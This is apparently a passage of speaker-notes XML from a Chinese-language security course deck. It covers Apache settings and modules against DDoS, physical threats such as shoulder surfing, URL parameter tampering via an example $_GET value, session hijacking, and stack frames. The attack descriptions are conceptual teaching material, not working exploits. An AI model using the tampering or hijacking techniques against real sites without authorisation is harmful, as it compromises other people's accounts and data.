                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>DDOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>，比如调小 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Timeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>KeepAlive Timeout </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>值，增加 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>MaxClients </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>值（可能影响正常业务）。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>提供的模块接口可以扩展 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>、设计防御措施，比如 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>mod_qos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>（限制单个 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>地址的访问频率），</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>mod_evasive</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Yahoo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Detecting system abuse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>。</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196</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40617029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7C59652A-5870-46AA-A352-14569C35A7EC}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>197</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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5488636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599314C-4AEE-40DE-ACFD-99373003F878}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>199</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman"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41625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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2518108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207372-B62C-4FA4-8321-1982454EA975}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>200</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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01250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9E78D2-48AC-4307-9AC1-C3AF58933695}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>201</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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50796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BC032-7902-4B16-89D4-E07C13D56ECA}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>202</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703207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DFEF85-65DE-420A-A397-898837189A5C}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>203</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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26793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4C7EE-D1D2-441F-B081-0092D83D97BE}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>204</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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095497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E73D-4354-4421-89E6-0725766CDD8A}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>205</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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94096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8AAD9-FAFB-463D-AF50-DAA32B62BB46}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>206</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015863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9CC1A-FC05-47A1-A5B4-AB4DAFB4055A}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>207</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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55186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06241E0-5D28-469D-9873-4643775C78AF}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>208</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">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766116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CEF93D1-0A62-4AC3-B5DC-4D50CB55B6E8}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>209</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Times New Roman"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50165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a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>旁侧偷看</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a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>未上锁的终端</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a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>被写下的口令</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a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>拔掉机器</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1">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>本地登录</a:t>
            </a:r>
          </a:p>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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2798125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FF95AC-22A7-4341-BD32-3BD843AF4C0B}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>210</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317534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52F72E-C1CD-4245-956B-93470F336806}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>211</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>来进行攻击，攻击方式就是更改地址栏中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>$_GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>的参数，另外进行一些必要的猜测，比如以下面的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>为例：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>http:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="1" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>//www.myfreax.com/category.php?category=mysql3</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>攻击者可以了更改后面的参数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>mysql3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="0" i="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>的数值，进行猜测，</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="609974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16FB0-B854-4457-B0F0-1C035B1F2454}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>212</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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会话劫持（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Session hijacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>），这是一种通过获取用户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Session ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>后，使用该</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Session ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>登录目标账号的攻击方法，此时攻击者实际上是使用了目标账户的有效</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>。会话劫持的第一步是取得一个合法的会话标识来伪装成合法用户，因此需要保证会话标识不被泄漏。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>————————————————</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>版权声明：本文为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>CSDN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>博主「马学朝」的原创文章，遵循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https://blog.csdn.net/h_mxc/article/details/50542038</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20690860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16FB0-B854-4457-B0F0-1C035B1F2454}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>215</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72519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F3447A-2315-43EF-B0AB-01058080823F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>216</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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98027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A5ED8B6-8197-4BC9-BF3E-508A41D62D93}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:pPr/>
              <a:t>217</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:ea typeface="宋体"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0724057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DEDEE5-2910-4A32-95A8-2E91F5EE0957}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>220</a:t>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zh-CN" altLang="en-US" dirty="0"/>
              <a:t>二班</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>9-25</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9773465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沙</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>9-21</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223</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6039218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栈帧也叫过程活动记录，是编译器用来实现过程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数调用的一种数据结构。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>从逻辑上讲，栈帧就是一个函数执行的环境：函数参数、函数的局部变量、函数执行完后返回到哪里等等。</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224</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="676122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栈帧也叫过程活动记录，是编译器用来实现过程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>函数调用的一种数据结构。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>从逻辑上讲，栈帧就是一个函数执行的环境：函数参数、函数的局部变量、函数执行完后返回到哪里等等。</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225</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="402936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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9305256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2879933-A891-4C8B-A25D-8AA5FA0A23ED}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0">
                <a:ea typeface="宋体" charset="-122"/>
              </a:rPr>
              <a:pPr/>
              <a:t>227</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:ea typeface="宋体" charset="-122"/>
            </a:endParaRPr>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7941528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C07CB6-1C42-4064-B242-CECCC0EFED09}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>228</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" alt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352710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56CE2-C8AF-4132-A2AC-A1F8B7623C57}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>229</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" alt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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>清</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>4-1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12139635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C2E52-5A11-463E-A3BA-63DEDBD7075F}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>235</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r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
